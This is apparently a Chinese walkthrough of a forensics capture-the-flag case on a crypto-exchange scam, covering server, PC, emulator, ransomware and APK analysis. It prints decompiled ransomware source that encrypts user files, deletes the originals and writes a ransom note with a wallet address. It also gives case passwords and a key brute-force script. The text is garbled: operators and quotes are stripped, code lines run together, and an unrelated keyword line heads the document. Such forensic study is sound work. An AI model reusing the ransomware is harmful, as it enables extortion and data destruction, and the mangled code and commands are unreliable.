什么是网站开发公司,网站后台服务器内部错误,最牛论坛网站,自己做网站新手入门案件情况
某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗#xff0c;该网站号称使用“USTD 币”购买所谓的“HT 币”#xff0c;受害人充 值后不但“HT 币”无法提现、交易#xff0c;而且手机还被恶意软件锁定 勒索。警方根据受害人提供的虚拟币交易网站调取了对应…案件情况
某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗该网站号称使用“USTD 币”购买所谓的“HT 币”受害人充 值后不但“HT 币”无法提现、交易而且手机还被恶意软件锁定 勒索。警方根据受害人提供的虚拟币交易网站调取了对应的服 务器镜像并对案件展开侦查。
检材1 1、检材1的SHA256值为
火眼打开之后计算出希哈值9E48BB2CAE5C1D93BAF572E3646D2ECD26080B70413DC7DC4131F88289F49E34 2、 分析检材1搭建该服务器的技术员IP地址是多少用该地址解压检材2【172.16.80.100】
仿真出来last命令
172.16.80.100 3、 检材1中操作系统发行版本号为
Cntos Linux release 7.5.1804 (Core)
cat /etc/redhat-release4、 检材1系统中网卡绑定的静态IP地址为
172.16.80.133
ifconfig命令查看即可 5、检材1中网站jar包所存放的目录是 答案为绝对路径如“/home/honglian/”)
/web/app
查看历史命令发现多次进入/web/app目录并执行npm等指令进入后发现有多个jar包确定为网站jar包所存放目录 6、检材1中监听7000端口的进程对应文件名为
cloud.jar
导出所有jar包放入Java反编译工具此时遇到打不开的情况可以重新去检验镜像哈希应该是镜像损坏导致导出的jar包损坏 7、检材1中网站管理后台页面对应的网络端口为【9090】
在检材二的charm浏览器的历史记录中 8、 检材1中网站前台页面里给出的APK的下载地址是
网站启动起来 3000端口出现app下载扫描二维码 可以知道网址是https://pan.forensix.cn/f/c45ca511c7f2469090ad/?dl1 9. 检材1中网站管理后台页面调用的用户表(admin)里的密码字段加密方式为?
导出admin所在jar包搜索password可以发现密码和验证码的加密方式都为MD5 10. 分析检材1网站管理后台登录密码加密算法中所使用的盐值是
XehGyeyrVgOV4P8Uf70REVpIw3iVNwNs
定位md5Key
最后发现MD5.key即为加密算法的盐值 检材2
11. 检材2中windows账户Web King的登录密码是
135790
通过分析软件可以看到密码 12. 检材2中除检材1以外还远程连接过哪个IP地址并用该地址解压检材3
172.16.80.128
查看xshell的连接记录可以发现
已知检材1的IP是172.16.80.133
所以在分析结果中排除172.16.80.133另一个IP即是答案 13. 检材2中powershell中输入的最后一条命令是
ipconfig
powershell命令的默认存储目录\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt在该路径下也可以找到 14. 检材2中下载的涉案网站源代码文件名为
ZTuoExchange_framework-master.zip
谷歌浏览器里有相应的zip下载记录导出文件 15. 检材2中网站管理后台root账号的密码为
root
在谷歌浏览器保存了账号和密码 16. 检材2中技术员使用的WSL子系统发行版本是答案格式如下windows 10.1
Ubuntu 20.04
仿真过后通过命令wsl -l可以获取到 或者通过分析程序发现命令都是在20.04中输入的 17. 检材2中运行的数据库服务版本号是答案格式如下10.1 8.0.30
通过分析程序查看可以看到版本号 18. 上述数据库debian-sys-maint用户的初始密码是
mysql的debian-sys-maint的初始密码保存在mysql目录的配置文件debian.cnf中
数据库是在wsl子系统中运行的因此需要定位到子系统目录C:\Users\Web King\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu20.04LTS_79rhkp1fndgsc\LocalState\rootfs
19. 检材3服务器root账号的密码是
h123456 系统SSH历史输入命令中发现曾使用sshpass对172.16.80.128进行连接连接密码为h123456 检材三
根据网站前端和技术员个人电脑上的线索发现了网站后端所在的服务器IP并再次调证取得“检材3”分析所有掌握的检材回答下列问题
通过第12题答案解压检材3
20. 检材3中监听33050端口的程序名program name)为
docker-proxy
在历史命令中发现嫌疑人进入了/data/mysql 之后使用了docker-compose up
进入目录后查看docker-compose.yml配置文件发现使用了33050尝试启动后发现program name netstat -tunlp 21. 除MySQL外该网站还依赖以下哪种数据库
在对admin-api.jar的逆向分析中发现使用了redis以及mongodb 22. 检材3中MySQL数据库root账号的密码是
admin-api.jar中也可分析出密码 23. 检材3中MySQL数据库在容器内部的数据目录为 通过进入容器内部找到相关信息
docker exec -it 8eda4cb0b452 bash 24. 涉案网站调用的MySQL数据库名为、
b1 25. 勒索者在数据库中修改了多少个用户的手机号
在 docker 中的 /var/lib/mysql 目录下根据 docker-compose 的配置映射到宿主机上就在 /data/mysql/db 目录下,8eda4cb0b452.log可以导出来查看比较方便,问修改的数量过滤 update 关键字在日志中有 8 处匹配但实际上有关 mobile_phone 的日志只有 3 条
2022-10-18T08:48:06.120268Z 8 Query update admin set last_login_time2022-10-18 04:48:06.114, last_login_ipnull where id1
2022-10-18T08:48:21.016425Z 8 Query update admin set last_login_time2022-10-18 04:48:21.023, last_login_ip172.16.80.100 where id1
2022-10-18T09:38:56.117223Z 9 Query update admin set last_login_time2022-10-18 05:38:56.113, last_login_ip172.16.80.197 where id1
2022-10-19T03:20:39.001499Z 13 Query UPDATE b1.member SET mobile_phone 13638991111 WHERE id 9
2022-10-19T03:20:41.851525Z 13 Query UPDATE b1.member SET mobile_phone 13282992222 WHERE id 10
2022-10-19T03:20:44.184953Z 13 Query UPDATE b1.member SET mobile_phone 13636993333 WHERE id 11
2022-10-19T05:34:00.075764Z 10 Query select count(a.id) from member a , member_application b where a.id b.member_id and b.audit_status 2 and date_format(b.update_time,%Y-%m-%d) 2022-10-18
2022-10-20T03:18:25.478485Z 10 Query update admin set last_login_time2022-10-19 23:18:25.461, last_login_ip172.16.80.100 where id1
26. 勒索者在数据库中删除的用户数量为
28
在log文件中可以搜索到有批量删除的记录delete from b1 member··记数一下有28个 27. 还原被破坏的数据库分析除技术员以外还有哪个IP地址登录过管理后台网站用该地址解压 检材4
172.16.80.197
用数据库分析工具来分析一下172.16.80.197登录了管理后台的网址 28. 还原全部被删改数据用户id为500的注册会员的HT币钱包地址为
cee631121c2ec9232f3a2f028ad5c89b
在member_wallet表中找到ID500的用户得到 29. 还原全部被删改数据共有多少名用户的会员等级为’LV3’
将member数据库导出成csv结构筛选出member_grade_id3有158条。但我们还要还原数据实际上 member 表中还有 28 条被删除的用户记录28 个用户中有6个 LV3共164个
“SELECT count(member_grade_id) FROM member WHERE member_grade_id3” 30. 还原全部被删改数据哪些用户ID没有充值记录
318989
SELECT id from member where id not in (select member_id from member_transaction) 31. 还原全部被删改数据2022年10月17日总计产生多少笔交易记录
1000
select count(*) from member_transaction where create_time BETWEEN 2022-10-17 00:00:00 and 2022-10-17 23:59:59 32. 还原全部被删改数据该网站中充值的USDT总额为
408228
select sum(amount) from member_transaction 检材四
根据前期侦查分析通过技术手段找到了幕后老板并对其使用的安卓模拟器“检材4”进行了固定。分析所有掌握的检材回答下列问题
修改文件为zip然后打开发现vmdk文件导入火眼中分析
33. 嫌疑人使用的安卓模拟器软件名称是
夜神模拟器 34. 检材4中“老板”的阿里云账号是
forensixtech1 35.检材4中安装的VPN工具的软件名称是
v2Ray
配置信息里面就有 36. 上述VPN工具中记录的节点IP是
38.68.135.18 37. 检材4中录屏软件安装时间为
2022-10-19 10:50:27
通过apk的位置找到软件的包名 回到火眼 38. 上述录屏软件中名为“s_20221019105129”的录像在模拟器存储中对应的原始文件名为
0c2f5dd4a9bc6f34873fb3c0ee9b762b98e8c46626410be7191b11710117a12d 在目录/storage/emulated/0/Android/data/com.jiadi.luping/files 下找到录屏文件 39. 上述录屏软件登录的手机号是
18645091802
通过导出record.db还有record.db-wal文件导入DB Brower中分析得到 40. 检材4中发送勒索邮件的邮箱地址为
skterran163.com
火眼直接分析得到 EXE分析
分析所有掌握的检材找到勒索邮件中被加密的文档和对应的加/解密程序并回答下列问题
41.分析加密程序编译该加密程序使用的语言是
python 42. 分析加密程序它会加密哪些扩展名的文件
txt.jpg.docx.xls
参考文章pyinstaller打包成exe的反向解析工具(pyinstxtractor.py和uncompyle6) - 简书 python pyinstxtractor.py encrypt_file.exe 在解析生成的encrypt_file.exe_extracted目录中的PYZ-00.pyz_extracted目录
找一个.pyc文件复制前12字节16进制到encrypt_file_1前面 用uncompyle6进行反编译
uncompyle6 .\encrypt_file_1.pyc 123.py
反编译成功
# uncompyle6 version 3.8.0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.7.4 (tags/v3.7.4:e09359112e, Jul 8 2019, 20:34:20) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: encrypt_file_1.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import time
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import os
pubkey -----BEGIN PUBLIC KEY-----\n有风险提示所以删除只留下后5位uw\n-----END PUBLIC KEY-----\n
msg SOMETHING WENT WRONG,PLEASE CONTACT YOUR SYSTEM ADMINISTRATOR!\nHe can help you to understand whats happened.\nIf he cant help you,contact us via email:\naa1028forensix.cn\naleforensix.cn\nHURRY UP!WE HAVE ANTIDOTE FOR YOUR FILES!DISCOUNT 20%FOR CLIENTS,WHO CONTACT US IN THE SAME DAY!\nYou can attach 2 files (text or picture)to check our honest intentions,we will heal them and send\nback.\nPlease pay 0.618 ETH\nThe wallet address0xef9edf6cdacb7d925aee0f9bd607b544c5758850\n************************************\nclass XORCBC:def __init__(self, key: bytes):self.key bytearray(key)self.cur 0def encrypt(self, data: bytes) - bytes:data bytearray(data)for i in range(len(data)):tmp data[i]data[i] ^ self.key[self.cur]self.key[self.cur] tmpself.cur (self.cur 1) % len(self.key)return bytes(data)print(加密程序V1.0)
print(文件正在加密中~~~~~~~~~~~~~~~~~~\n)def run_finall():for filepath, dirnames, filenames in os.walk(os.getcwd()):for filename in filenames:if filename ! encrypt_file.py and filename ! decrypt_file.py and _encrypted not in filename:ExtensionPath os.path.splitext(filename)[(-1)]if .txt ExtensionPath or .jpg ExtensionPath or .xls ExtensionPath or .docx ExtensionPath:time.sleep(3)data_file os.path.join(filepath, filename)rsakey RSA.import_key(pubkey)cipher Cipher_pkcs1_v1_5.new(rsakey)xor_key os.urandom(16)xor_obj XORCBC(xor_key)outf open(data_file _encrypted, wb)encrypted_xor_key cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size 4096with open(data_file, rb) as (f):while True:data f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))outf.close()os.remove(data_file)run_finall()def redme():try:dir os.path.join(os.path.expanduser(~), Desktop)print(dir)with open(dir /!READ_ME.txt, w) as (ff):ff.write(msg)except:dir1 os.getcwd()print(dir1)with open(dir1 /!READ_ME.txt, w) as (ff):ff.write(msg)print(\n加密完成~~~~~~~~~~~~~~~~~~)
os.system(pause)
# okay decompiling .\encrypt_file_1.pyc
“if .txt ExtensionPath or .jpg ExtensionPath or .xls ExtensionPath or .docx ExtensionPath:”-----------------是对txt.jpg.docx.xls的文件进行加密
43. 分析加密程序是通过什么算法对文件进行加密的
data_file os.path.join(filepath, filename)rsakey RSA.import_key(pubkey)cipher Cipher_pkcs1_v1_5.new(rsakey)xor_key os.urandom(16)xor_obj XORCBC(xor_key)outf open(data_file _encrypted, wb)encrypted_xor_key cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size 4096with open(data_file, rb) as (f):while True:data f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))outf.close()os.remove(data_file)
首先把公钥导入生成一个rsakey然后把rsakey通过cipher加密生成了一个cipher字符串随后通过cipher加密了xor_keyxor_key是一个随机的16位字符串os.urandom(16)因此是outf.write(encrypted_xor_key)加密了文件
异或加密
class XORCBC:def __init__(self, key: bytes):self.key bytearray(key)self.cur 0def encrypt(self, data: bytes) - bytes:data bytearray(data)for i in range(len(data)):tmp data[i]data[i] ^ self.key[self.cur]self.key[self.cur] tmpself.cur (self.cur 1) % len(self.key)return bytes(data)
44. 分析加密程序其使用的非对称加密方式公钥后5位为
根据解密后的内容得到公钥
pubkey -----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrwHvbuNMoQNdOJNZZVo\nbHVZhrCI4MwAhEBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoauw\n-----END PUBLIC KEY-----\n可以得到uw
45. 被加密文档中FLAG1的值是
TREFWGFS
通过相同的方法对decrypt_file.exe进行逆向
随后得到的密码为4008003721
使用该密码解密 apk分析
46. 恶意APK程序的包名为
cn.forensix.changancup
通过第8题得到的链接下载apk并分析jadx打开看到包名 47. APK调用的权限包括
READ_EXTERNAL_STORAGE|WRITE_EXTERNAL_STORAGE
继续查看AndroidManifest.xml得到权限 48. 解锁第一关所使用的FLAG2值为FLAG为8位字符串如需在apk中输入FLAG请输入完整内容如输入FLAG9:QWERT123
MATSFRKG
利用雷电进行一键脱壳 脱壳后反编译jadx
直接搜索FLAG2可以看到结果 49. 解锁第二关所使用的FLAG3值为(FLAG为8位字符串如需在apk中输入FLAG请输入完整内容如输入FLAG9:QWERT123)
找到了mainactivity分析flag2周围的函数
找到加密的地方
} else if (App.OooO0O0.OooO0oo.equals(this.OooO0o0.getText().toString()) App.OooO0OO.edit().putInt(unlocked, App.OooO0OO.getInt(unlocked, 0) | 2).commit()) {StringBuilder OooO0OO2 C0261o0000Oo.OooO0OO(App.OooO0OO.getString(flag16_tkey, ));OooO0OO2.append(App.OooO0O0.OooO0oo);if (App.OooO0OO.edit().putString(flag16_tkey, OooO0OO2.toString()).commit()) {App.OooO0Oo();System.out.println(delay lock screen close);OooO00o();}this.OooO0oo new String(decrypt(OooO0O0.OooO0O0(ffd4d7459ad24cd035611b014a2cccac)));
分析可得进行了两次加密
decrypt函数
public native byte[] decrypt(byte[] bArr);public native byte[] encrypt(byte[] bArr);public native void init(byte[] bArr);init函数调用了libcipher.so对密文进行了解密与输入的值进行比较最终判断是否正确
package com.example.hanshu;
import android.app.Application;
import android.util.Log;public class App extends Application {static {System.loadLibrary(cipher);}public native byte[] decrypt(byte[] bArr);public native byte[] encrypt(byte[] bArr);public native void init(byte[] bArr);public static void main(){String out new String(new App().decrypt(OooO0O0(ffd4d7459ad24cd035611b014a2cccac)));System.out.println(ocipher:out);}public static byte[] OooO0O0(String str){int length str.length() / 2;byte[] bArr new byte[length];for (int i 0; i length; i){int i2 i 2;bArr[i] (byte) Integer.parseInt(str.substring(i2, i22), 16);}return bArr;}}最后连接模拟器将此apk推送到模拟器中查看日志即可找到FLAG3
FLAG3:TDQ2UWP9 50. 解锁第三关所需的KEY值由ASCII可显示字符组成请请分析获取该KEY值
限制输入24个字符串然后分成四位一组分成六组数 密码由全部可显示的ASCII码组成在标准的ASCII表中可打印的字符的编码范围是33-126在代码中是对分为6组的数组依次判断也就是说我们可以通过每4位爆破的方式组成全部的密码 public class Test{static int[] OooO0oO {1197727163, 1106668241, 312918615, 1828680913, 1668105995, 1728985987};public static long[] OooO(long j, long j2) {if (j 0) {return new long[]{0, 1};}long[] OooO OooO(j2 % j, j);return new long[]{((j2 / j) * OooO[0]) OooO[1], OooO[0]};}public static void main(String[] args) {String res ;for (int i 0; i 6; i) {//4层循环遍历4位字符串for (int a1 33; a1 127; a1) {for (int a2 33; a2 127; a2) {for (int a3 33; a3 127; a3) {for (int a4 33; a4 127; a4) {long tmp (long) (a1 16);tmp tmp | ((long) (a2 \b));tmp tmp | ((long) (a3 24));tmp ((long) a4) | tmp;if (((OooO(tmp, 0x100000000L)[0] % 0x100000000L) 0x100000000L) % 0x100000000L ((long) OooO0oO[i])) {res (char)a1;res (char)a2;res (char)a3;res (char)a4;//获取到当前密码后跳出4层循环a1 a2 a3 a4 128;}}}}}}System.out.println(res);}
}
运行结果 a_asd./1imc2)dd1234]_
